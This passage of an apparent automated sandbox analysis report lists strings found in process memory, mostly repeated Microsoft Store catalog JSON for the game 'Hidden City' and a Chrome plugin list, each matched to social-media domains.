","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
                    Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
                    Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
                    Source: 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.youtube.com (Youtube)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.youtube.com (Youtube)
                    Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
                    Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
                    Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR